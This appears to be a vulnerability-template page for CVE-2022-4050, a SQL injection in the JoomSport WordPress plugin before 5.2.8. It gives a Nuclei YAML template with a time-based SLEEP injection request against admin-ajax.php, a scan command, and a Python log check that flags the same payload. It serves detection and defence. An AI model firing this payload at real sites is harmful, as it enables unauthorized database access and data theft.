WordPress JoomSport <5.2.8 - SQL Injection
ID: CVE-2022-4050
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev
Description
WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
YAML Source
id: CVE-2022-4050

info:
  name: WordPress JoomSport <5.2.8 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
  impact: |
    An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Update to JoomSport plugin version 5.2.8 or later.
  reference:
    - https://wpscan.com/vulnerability/5c96bb40-4c2d-4e91-8339-e0ddce25912f
    - https://wordpress.org/plugins/joomsport-sports-league-results-management/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4050
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4050
    cwe-id: CWE-89
    epss-score: 0.04713
    epss-percentile: 0.92631
    cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: beardev
    product: joomsport
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev

http:
  - raw:
      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(7))aaaa);--+-"}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "jscaruselcont jsview2")'
        condition: and
# digest: 4b0a0048304602210095e433f2a8fe6085d181527208d2ace4a0bf53b714905418c609798a7d127487022100e7ba028db599aab21a97543c2d3a5bb71fdab72e008777ac6b7463356a1c88aa:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-4050.yaml"
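A defender-side counterpart to the request in the template above, as an added example (not part of the template or of the JoomSport code): it inspects logged requests to the `joomsport_md_load` AJAX action and flags a `shattr` whose `id` is not a plain integer. It assumes the request log or WAF audit log captures POST bodies and that legitimate `id` values are integers; the function name and the benign sample are constructed for illustration.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"   # endpoint used by the template
ACTION = "joomsport_md_load"             # AJAX action used by the template
PLAIN_INT = re.compile(r"\d+")           # assumption: a legitimate "id" is an integer


def inspect_request(method, url, body):
    """Return findings for one logged request; an empty list means nothing to report."""
    parts = urlsplit(url)
    form = parse_qs(body, keep_blank_values=True)
    # WordPress accepts "action" in the query string or in the POST body.
    action = (parse_qs(parts.query).get("action") or form.get("action") or [""])[0]
    if method.upper() != "POST" or not parts.path.endswith(AJAX_PATH) or action != ACTION:
        return []
    findings = []
    for raw in form.get("shattr", []):
        try:
            attrs = json.loads(raw)
        except ValueError:
            findings.append("shattr is not valid JSON")
            continue
        if not isinstance(attrs, dict):
            findings.append("shattr is not a JSON object")
            continue
        # Only the "id" key is checked, because it is the one the template exercises.
        if "id" in attrs and not PLAIN_INT.fullmatch(str(attrs["id"])):
            findings.append(f"non-integer shattr id: {str(attrs['id'])!r}")
    return findings


# Constructed sample requests: BENIGN is a made-up normal call, PROBE is the
# request body from the template above.
URL = "/wp-admin/admin-ajax.php?action=joomsport_md_load"
BENIGN = 'mdId=1&shattr={"id":"1"}'
PROBE = 'mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(7))aaaa);--+-"}'

if __name__ == "__main__":
    for body in (BENIGN, PROBE):
        print(inspect_request("POST", URL, body) or "clean")
```

A hit from this check on a site still running a JoomSport version before 5.2.8 is a reason to review database activity for the same time window, in addition to applying the update.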